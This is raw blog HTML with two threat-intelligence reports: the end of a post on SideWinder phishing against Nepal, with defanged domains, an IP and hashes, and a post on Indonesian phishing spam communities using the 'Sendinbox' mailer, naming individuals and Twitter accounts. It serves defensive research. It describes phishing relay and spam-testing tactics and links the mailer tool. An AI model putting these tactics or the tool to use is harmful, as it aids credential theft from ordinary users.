href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oENZ2pMcUx7-0KwRd_wEO5u_dj_heWa2eTgFMBWbTlTHUg2taI8gyIOb-SV0PgrUPjcdpn01TgrXuHW7COU2EPSnsuNrpqLPZXK514sq3VUkF4cJNWoac4thnnRenaheVsaK125c96HP/s1517/17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="1517" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oENZ2pMcUx7-0KwRd_wEO5u_dj_heWa2eTgFMBWbTlTHUg2taI8gyIOb-SV0PgrUPjcdpn01TgrXuHW7COU2EPSnsuNrpqLPZXK514sq3VUkF4cJNWoac4thnnRenaheVsaK125c96HP/w640-h202/17.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span></span></span></span><div class="separator" style="clear: both;">This finding is particularly interesting considering the fact that Nepal was meant to be having elections fast approaching in April and May of this year, only to be very recently overturned as of <a href="https://www.wionews.com/south-asia/nepal-supreme-court-overturns-prime-minister-kp-sharma-olis-house-dissolution-365693">last week</a>. <br /><br />Considering that these elections were only recently announced in the end of December 2020, we think that this proves as to some of the motivation behind the group’s renewed activity and new target focus as of the past couple of months. <span><span><span><span><span><span><span><span><span><div style="font-family: Arial;"><br /></div></span></span></span></span></span></span></span></span></span><div><span><span><span><span><span><span><span><span><span><span><p dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center; vertical-align: baseline; white-space: pre-wrap;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;"><span style="color: #ffa400; font-family: inherit; font-size: medium;">Conclusion</span></span></p></span></span></span></span></span></span></span></span></span></span><br />There were a few other findings we gathered from this server which we decided not to blog about in this post as we didn't consider them much different from the phase of operations this group was at at the end of last year. Like some which were connected to the mobile malware applications being developed by SideWinder, as this part of their operations seems to be still very much in the development and testing stage. As evident by what looks like internal testing left behind by the developers.</div><div><span><span><span><span><span><span><span><span><span><span><br /><p dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; vertical-align: baseline; white-space: pre-wrap;"></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgILxLsjIVDo95gPwcMSscChy6djACDW1F7vKWnWnffdF4wLv1LJklEbwDY3IaBHuXd-dGJ7cH_ZTDDHuMBauniQ_uuqCBu6kafGF6j9Y1iVakmMuAQeHN2zgX7gia0Ma9HLImGPj-bPocE/s1110/18.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="399" data-original-width="1110" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgILxLsjIVDo95gPwcMSscChy6djACDW1F7vKWnWnffdF4wLv1LJklEbwDY3IaBHuXd-dGJ7cH_ZTDDHuMBauniQ_uuqCBu6kafGF6j9Y1iVakmMuAQeHN2zgX7gia0Ma9HLImGPj-bPocE/w640-h230/18.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Log left behind by the group.</td></tr></tbody></table></span></span></span></span></span></span></span></span></span></span><br />We also can’t confirm that all of the phishing infrastructure we uncovered will indeed be infected with malware or have a preceding malicious payload once in use. Even with the proximity of the phishing pages residing on the same server with other malware it remains unclear at this stage. Some of these pages may very well be used in single purpose credential phishing campaigns.<br /><br />On the other hand, what we did cover in this post indicates how SideWinder is very much focused on conducting espionage operations against their target area of interest in South Asia. Taking into account what this group has done in the past year; we see that we should take this renewed activity as an indication that SideWinder will only continue to ramp up its activities in the rest of the upcoming months of 2021 and beyond.<br /><br />The group’s continued interest in Nepal serves as evidence to that – We can only speculate that regional developments such as the potential elections in countries of the region, geopolitical tensions such as the military clashes in the India-China border, international events mixed in with regional efforts such as COVID-19 vaccine distribution, and other regional interests will only continue to fuel such campaigns conducted by the group in South Asia. We should anticipate more of such spear phishing activity and further development of their malware and specific mobile malware capabilities to launch such campaigns against the group’s targets of interest. <div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;"><span><span><span><span><span><span><span><span><span><span><span id="docs-internal-guid-95cc3a8d-7fff-903a-bdac-959e7d316716"><div style="font-family: Arial; white-space: pre-wrap;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></div></span></span></span></span></span></span></span></span></span></span></span><div><span><span><span><span><span><span><span><span><span><span><span><span><p dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left; vertical-align: baseline; white-space: pre-wrap;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;"><span style="font-family: inherit; font-size: medium;">Indicators of Compromise</span></span></p></span></span></span></span></span></span></span></span></span></span></span></span><br />mail-ntcnetnp.serveftp[.]com<br />mail.aop.gavaf[.]org<br />mail.nepal.gavnp[.]org<br />mail.ncp.gavnp[.]org<br />mail-mofa.hopto[.]org<br />mail-mofagovpk.myftp[.]org<br />mail-mopitgovnp.hopto[.]org<br />webmail-accbt.hopto[.]org<br />mail-opmcmgavnp.hopto[.]org<br />mail-nepalpolgavnp.hopto[.]org<br />mail-apfgavnp.hopto[.]org<br />mail-meagovmv.hopto[.]org<br /><br />microsoft-winupdate.servehttp[.]com<br />changeworld.hopto[.]org<br />teamchat.hopto[.]org<br /><br />45.153.240[.]66<br /><br />680196722f65117a62cb3738f390e3552ffafcd663e85b7a81965f55462be994<br />0c182b51ff1dffaa384651e478155632c6e65820322774e416be20e6d49bb8f9<br />66dcaaa42e3f36f0560af741017c13c528758140f0f7f4260b9213739ffd9e70<br />ddc19d1421e2eed9c606c4249fab0662f1253e441da2f1285242cb03d5be5b32<br />f120cb306cb9e2cc0fbfb47e6bd4fdf2a3eea0447a933bc922f33ff458b43a86<br />fd48c8ae2753bb729ed26535726459f6c19e598fd270eaaa5c14f4d51ce348d5</div></div></div></div></div></div></div></div></div></div></div>Andrei Kornevhttp://www.blogger.com/profile/11381063307200503085noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-32130043417673943422018-09-05T16:00:00.001-04:002018-09-05T23:16:46.883-04:00Indonesian Spam Communities<a href="http://www.deependresearch.org/2018/07/uncovering-paypal-phishing-campaign.html" style="font-family: arial, helvetica, sans-serif;">In our last post</a><span style="font-family: "arial" , "helvetica" , sans-serif;"> we tried to shed some light at what seemed to appear as a very
common PayPal phishing email at first glance, but evidently turned out to be connected to a quite larger and more unique campaign the deeper we looked at. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">When we investigated that <a href="https://lh4.googleusercontent.com/yNJCPdXhOsAAw_W-hCXiffsDTra4_65Ctzy8ce_IlPnTsWWVbvVeU37fGkihKojjY82PiJvNChcFVN4bgxM8UlFiiIHS15HNzFqJ_M7Eqc9pOD09ZVJPv-JpyuMjj6i9lALM_gXV">single email</a>, we were actually able to discover a wide ranging spam group originating
from Indonesia which looked to be responsible for the phishing activity we originally saw. Through that seemingly common PayPal phishing email, we found out that an Indonesian
group was targeting various well-known companies’ customer base by mass sending
phishing emails via uniquely identifiable Twitter shortened URL redirections. </span><br />
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">They have done so with
great success, as we <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsrtlmSCcH2Ed8vr8ZSh5SRpNXgtR5207AHhlBb7EQM1T_MCamN3AfrUznzvOzO4deDcQVFOtP1KCCP1nQYpbagO_iC7SHFB3fCW5vHRp2CsjnLsvrJjNN9V7aiRWYRaXHfAqWSOTVvN2M/s1600/e57ef509-f094-4c20-b7ff-e40b82a3fbe5.jpg">demonstrated by showing</a> you some of the attacker’s self-shared
screenshots of incoming victim credit card information. And we last left off by identifying some additional Twitter handles
spreading phishing links and hunting some more connected infrastructure to that
specific campaign.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Since our last update on the matter,
we’ve continued to monitor this group’s activity, passing along our findings to
relevant parties. However, in the process of studying this group, we’ve also discovered
a secondary set of the Indonesian spamming community in addition to the already
identified SlackerC0de an</span><span style="font-family: "arial" , "helvetica" , sans-serif;">d Spammer ID from our previous post. This secondary group uses a set of slightly
different tools and techniques, but stays true to the identical core of collective
financial scamming efforts which we've previously written about.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b><u>SendInbox</u></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">While we were looking at what the Spammer ID guys were doing in their group, we saw that they began discussing an additional mailing tool they were using called "<a href="https://github.com/leakedtools/sendinbox">Sendinbox</a>". Up to this point we saw that they were mainly sharing their use of mailing tools like "<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS2kMPWN3X22AL4jdyBGWRrfQ6i18bG3y2XaTJeFbKUHHyV9vnUV1uBE7ONwfSuD2r5I0clnsilUzdmu8bpbvtMeNnv8zS9ihyphenhyphengwBCwnofRuHRUeTlogi7lWu-WVVFYAh7p75jdPKQa_hT/s1600/apple.jpg">heart sender</a>" and "<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLOylOxPtb6CJPh-jrpPF9sUwKZfe5by6oKIPfhkxPU8pDL2GtiO52PgebtMt1m4bYckichnX-YBmcTsCixW8ZvA7Dc0VC33A9Xm21tdDvLH6BZaKrl-S9aKtPFzfHpsY0Oi9mkafd8fhb/s1600/photo6082343719375316997.jpg">GX40 sender</a>". </span><span style="font-family: "arial" , "helvetica" , sans-serif;">We've also seen the Spammer ID group try and use <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxo3mCMbP6td4a6SlsdnGobd_y96Nb4GE2wciZ9Xg9P5fRluaqK2Th209ad87KAPp0qqVMX7CQuFJihvQgQL5VQo1faCdSFcSCvh48hfhLCT5t47GT8lwrl8BOJgXI3ozCTCRf0YKkzkL9/s1600/xampp.png">XAMPP</a> with sendmail from their localhost relaying through SlackerC0de infrastructure. They used these methods along with web based tools on their group websites like the ones we saw them make available on tool[.]slackerc0de[.]us</span>. <span style="font-family: "arial" , "helvetica" , sans-serif;">When we took a look at what "Sendinbox" was - </span><span style="font-family: "arial" , "helvetica" , sans-serif;"> we saw that it was a PHP tool based on the popular PHPMailer library. After we started going through the group's chat we witnessed them discuss how they're setting this tool through their shared group servers mainly using Apple and PayPal phishing letters as their payload.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwMnnxV6gx9pPiXv8n0v9gPqHAMQnA1Dag6zCqFgJlXKBw_yF3uXN6kB-Fh40vzYIzyV2RBjg7f-nMyAC6gyKGyIj1mmXr0pUys4Vn9uEEGdl-xkoWWjsOADnEyuYGwcghGHS3OfUjptxR/s1600/photo6069042008091109760.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwMnnxV6gx9pPiXv8n0v9gPqHAMQnA1Dag6zCqFgJlXKBw_yF3uXN6kB-Fh40vzYIzyV2RBjg7f-nMyAC6gyKGyIj1mmXr0pUys4Vn9uEEGdl-xkoWWjsOADnEyuYGwcghGHS3OfUjptxR/s640/photo6069042008091109760.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj55cARk3uDUX-zRhVTWk5Xdr3Aq98fTvSoophbx2hWJHpBEs2u2droIx77P6yoVyANIMsn-_Gy6LTN121iyP6Ul6RuS5Lp923-drNVVpocQC2aabet8OQbF4G0WmkRBKwXk0frs0_IYear/s1600/photo6073545607718480002.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="1280" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj55cARk3uDUX-zRhVTWk5Xdr3Aq98fTvSoophbx2hWJHpBEs2u2droIx77P6yoVyANIMsn-_Gy6LTN121iyP6Ul6RuS5Lp923-drNVVpocQC2aabet8OQbF4G0WmkRBKwXk0frs0_IYear/s640/photo6073545607718480002.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">As you can see from the above screenshots, the 'Sendinbox' tool lets the attacker send a set of many emails at once with a preconfigured scam message through mail relay servers. In this example an attacker is testing if his emails are being received as regular inbox mails or filtered as spam to his own Yahoo account. We kept seeing this type of "QA" process being taken by the different stages of server changes by the attackers. </span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><u>BMarket ID</u></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">"Sendinbox" is made by an "</span><span style="font-family: "arial" , "helvetica" , sans-serif;">Eka Syahwan" who runs a separate community of groups to Spammer ID on various social platforms. The main purpose for this being to provide support for his user base to whom he sold his mailer tool.</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> A happy customer in this case brings in more potential buyers. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">The main website for this community - Bmarket[.]or[.]id also hosts a relay server for email campaigns hxxp://bmarket[.]or[.]id/sendinbox-server[.]php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">A close knit user base such as this offers the potential scammer support for his phishing campaigns, the tool creator provides updates to the tool and workarounds to potential service blocks. Which <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3dqRD8OY2xiisgTjenjUs4rkkx2LZCGQJ9NQvV6DbLynJLMgGpn60UiNiIx16Ng11mpq0fe8qo4MzoZkqI8LaKlkUtka81g_Axyk1JUfn2lpycLcaPWooUwjZ9ABReA1fy9DGDBbOSHsa/s1600/photo4934108152937424846.jpg">kept amounting</a> the more we looked at their group correspondence. Group members complained that the provided email servers were not mailing their scams successfully or that they're going to spam folders. So we witnessed a heavy shift from the recognized servers like </span><span style="font-family: "arial" , "helvetica" , sans-serif;">bmarket[.]or[.]id</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> to group members actively looking for compromised servers to relay their emails. </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzeqBSMoo6Qs_InSWbboiwSQSnwYExprIwgMAzWDdbmCa-QUKZEWUVWQbGE04J6Mc4DHbl46oo0cA_TJxbpA6IOaRPD8tls4klPnyj671t_AG-uC7p9iYFdwt7itT8n5-y2ZcSmxkHP2S/s1600/telegram.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="535" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzeqBSMoo6Qs_InSWbboiwSQSnwYExprIwgMAzWDdbmCa-QUKZEWUVWQbGE04J6Mc4DHbl46oo0cA_TJxbpA6IOaRPD8tls4klPnyj671t_AG-uC7p9iYFdwt7itT8n5-y2ZcSmxkHP2S/s1600/telegram.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Group members such at the one above started looking for compromised servers to upload their sendinbox tool for future campaign use and shared them with the group. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">Once they've gained their successful hold on a compromised website, they uploaded their SendInbox email tool as can be seen below.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmkB8Dpbgzt2_RbKvAzLO_ZDlqc5K33W8lkVojtkSTvmrlQX2sfKIZpZ9EDdVPA76USKwsJtY5EIOn9y-8lySK5vMSlg85iVmPJ7M7DuGhZjU4CuoTFOHuxOwL10qv7InBKiDDCLcCsT1L/s1600/photo6075638833044629652.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="719" data-original-width="1280" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmkB8Dpbgzt2_RbKvAzLO_ZDlqc5K33W8lkVojtkSTvmrlQX2sfKIZpZ9EDdVPA76USKwsJtY5EIOn9y-8lySK5vMSlg85iVmPJ7M7DuGhZjU4CuoTFOHuxOwL10qv7InBKiDDCLcCsT1L/s640/photo6075638833044629652.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Other members also shared their use of vulnerability scanning tools to hunt for potential servers in the group chat.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1hahl-mGSN99TW9ohsNTQ7_qXt8dsLy_aGVOX8Pft8rOK-ISPc0djk1N_mNYqnoHBwA4DXqwKWjcyYDxDvmr-Aj0c4NiWWAdM1qmRwkXAmj4zj4f_GPIAN3iDMQHN0EJdbkgmmV5GkJz0/s1600/photo6073545607718480033.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1hahl-mGSN99TW9ohsNTQ7_qXt8dsLy_aGVOX8Pft8rOK-ISPc0djk1N_mNYqnoHBwA4DXqwKWjcyYDxDvmr-Aj0c4NiWWAdM1qmRwkXAmj4zj4f_GPIAN3iDMQHN0EJdbkgmmV5GkJz0/s640/photo6073545607718480033.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Along with the proactive hunting these group members were conducting, they were monitoring another website belonging to the "Sendinbox" tool creator called IndoXploit which listed additional compromised servers for them to use in their phishing campaigns.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHcdQ0SYaeXygt7C_773JvyNLdmQ4QW2IL4mw2wlxW_8tJO1nhjnn5SR3QOjHLjLFa6FMGWkn-eFvvbGkjNpG4GzfqG7fJQSlWmDJmEj_mfu4WPIDaDxuwsdnBoFzV38TTzKjl0Ls4U3Yw/s1600/photo6073545607718479999.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="719" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHcdQ0SYaeXygt7C_773JvyNLdmQ4QW2IL4mw2wlxW_8tJO1nhjnn5SR3QOjHLjLFa6FMGWkn-eFvvbGkjNpG4GzfqG7fJQSlWmDJmEj_mfu4WPIDaDxuwsdnBoFzV38TTzKjl0Ls4U3Yw/s1600/photo6073545607718479999.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Eka Syahwan even lists this fact on his personal Facebook profile, along with regular updates to his scamming activity, as we can see in his most recent warning post about some rippers that recently tried to do business with him on Telegram:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisVolEDY4CRXVGx0409ygEfuZxA1H5HePjAbFnSoVkGu4Vu6dH2HgqCeXHBWxjd0PpUqrXX9s6iRd2mFD0BhjeIoX_HSKyBeIfk_n5MA4D8lPb03xqMyZJYvzcBUPHVZ8lZo408JDT-E0J/s1600/EkaSyahwan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="316" data-original-width="712" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisVolEDY4CRXVGx0409ygEfuZxA1H5HePjAbFnSoVkGu4Vu6dH2HgqCeXHBWxjd0PpUqrXX9s6iRd2mFD0BhjeIoX_HSKyBeIfk_n5MA4D8lPb03xqMyZJYvzcBUPHVZ8lZo408JDT-E0J/s640/EkaSyahwan.png" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Since this is a smaller community with a tendency to share their success and failures a little bit more than Spammer ID - it made it easier for us to track what they were doing in their campaigns. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">And this group was definitely busy - we've seen them successfully harvest many CC records via targeted email lists, ranging from alphabetically ordered emails to emails from specific sectors like large educational institutions in the US. </span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP_7_kgwdhutQyFVXbGu7TZe5-gYxfyBaAQZXVf5ke8F1jGrTixSdBYbB2Vo8fLkA_sA1qe-iFUZ-F6_9Fu2myTKr3p9kwApFZ3b69CdQeV6fL7ODdHX1baUIS3FSHQA9xXyPkfXeUKUtU/s1600/ablist.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="719" data-original-width="1280" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP_7_kgwdhutQyFVXbGu7TZe5-gYxfyBaAQZXVf5ke8F1jGrTixSdBYbB2Vo8fLkA_sA1qe-iFUZ-F6_9Fu2myTKr3p9kwApFZ3b69CdQeV6fL7ODdHX1baUIS3FSHQA9xXyPkfXeUKUtU/s640/ablist.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;">An email list an attacker has prepared to massively spam his phishing letters. This list is alphabetically ordered Yahoo accounts which were already validated as Apple users. </td></tr>
</tbody></table>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We've witnessed this group target specific sectors or user base, such as in the below example of them targeting specifically Japanese users from IT provider Softbank Japan:</span><br />
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTrnXd9fxKjJR9CxQqhRkgxz44gVJr4Q08ozME02b3VezF6VZc9N4eOj9WFwsx7XMCohhob_NsPg1yaJqmwOJeWCfI64v2KNpl9C_XmnZDte8nX57BaXANbxo7K2lxkbTBq33h0bbQ2R2l/s1600/softbank.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1280" data-original-width="960" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTrnXd9fxKjJR9CxQqhRkgxz44gVJr4Q08ozME02b3VezF6VZc9N4eOj9WFwsx7XMCohhob_NsPg1yaJqmwOJeWCfI64v2KNpl9C_XmnZDte8nX57BaXANbxo7K2lxkbTBq33h0bbQ2R2l/s640/softbank.jpg" width="480" /></a></div>
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">This group is also sophisticated enough to socially engineer the appropriate letters for a geographically and linguistic group like these Japanese Apple users as we picked them testing out various Japanese templates, how they're received in a Japanese Yahoo, and bouncing if possible off Japanese accounts.</span><br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8jlE54l8P5QCtSKkjO0q7_m9Cq0-opUTmhXDYrCE-zrxpW2Kp8IuN5YNJ4A-dVuk4ylIRed9aGgghrvNM3zXGrLTluDCHBQaN8kEZ7i53e4GCFKHr5R0YU0LyT_t4UQCB6857q-r6y2w6/s1600/japanemail.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8jlE54l8P5QCtSKkjO0q7_m9Cq0-opUTmhXDYrCE-zrxpW2Kp8IuN5YNJ4A-dVuk4ylIRed9aGgghrvNM3zXGrLTluDCHBQaN8kEZ7i53e4GCFKHr5R0YU0LyT_t4UQCB6857q-r6y2w6/s640/japanemail.jpg" /></a></div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg37o3ydgh7_fE4iE8j5S7Zo9BSeWMqGd5XEL7CZqErofIqdfsap_Cb2jMex7AYzs3pzUjhyphenhyphenTwRB1Lg7-zxO-xuPJTRV3f9_1DzvHhlYU1lqRAV7_GeHTeMoyolOo6BDost3zhzeJqZZP2i/s1600/yahoojp.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg37o3ydgh7_fE4iE8j5S7Zo9BSeWMqGd5XEL7CZqErofIqdfsap_Cb2jMex7AYzs3pzUjhyphenhyphenTwRB1Lg7-zxO-xuPJTRV3f9_1DzvHhlYU1lqRAV7_GeHTeMoyolOo6BDost3zhzeJqZZP2i/s640/yahoojp.jpg" /></a></div>
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhPzQKvtq6Ebl24CFxlPoyrU2BIeylE3Ci1OINjwQ587knqyob_Hs2jH5sCTaG_m570J6jGrmqlZsHATDPpkCpQZK7Tvfcpfqk1LVqkbizbEz36nplA1D80DzhO2Ek87DTM-pNAoI7w5Qp/s1600/photo6082524584743118946.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhPzQKvtq6Ebl24CFxlPoyrU2BIeylE3Ci1OINjwQ587knqyob_Hs2jH5sCTaG_m570J6jGrmqlZsHATDPpkCpQZK7Tvfcpfqk1LVqkbizbEz36nplA1D80DzhO2Ek87DTM-pNAoI7w5Qp/s640/photo6082524584743118946.jpg" /></a></div>
<div style="text-align: center;">
Successfully harvested credentials received in an attacker's email.</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">
We only were able to look at the shared incoming credentials in the group chats, which amounted to hundreds of victims by our count. If we were to combine the credentials which weren't being shared it probably would make the true number of their victims much higher than that. </span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><u>Conclusions</u></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Traditional phishing hunting operations tend to rely on certificate and brandname watching. This tactic offers to usually be quite successful since phishing domains don't tend to have a lifespan larger than a day or two, and if by any chance the phishing page wasn't hunted, it at least is usually reported as fake by wary users. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">The threat that closed scamming communities such as BMarket poses is the advantage of crowdsourcing their setbacks and problems. While a single and lone scammer might quit after being unsuccessful in his attack, a strong base of experienced users, and in this case a tool creator looking to satisfy his clients will immediately fix what is being broken or detected by phish domain watchers. It also offers some confidentiality to their operations.</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> A small group such as this is harder to track when it doesn't make much noise beyond their chat platforms. While some of their phishing domains are quickly identified, when looking at their operations - we saw that a lot of Apple and PayPal customers still fell victim to their ploy. We also think this is due to this group's heavy use of shortened and redirected links.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">In the grander scheme of the cybercrime landscape, it seems that relying on passive hunting may not replace actively tracking and infiltrating cybercrime groups to successfully mitigate some parts of phishing activity such as this. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><u>IOCs</u></b></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Twitter handles connected to this group:</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/belajargila3</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/nawalbelh</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/johanes95826552</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/jancoek14</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/rohmatizud</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/Ongki54705384</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/test19259665</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/wibowoandy14</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/baringinasido</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/PnatekM</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/bambangkou</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/Bajungan1</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/dzakialvriano1</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/bastian55115067</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/pea_sang</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/yusupmuhammad23</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/akibernad</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/XCrow8</span><br />
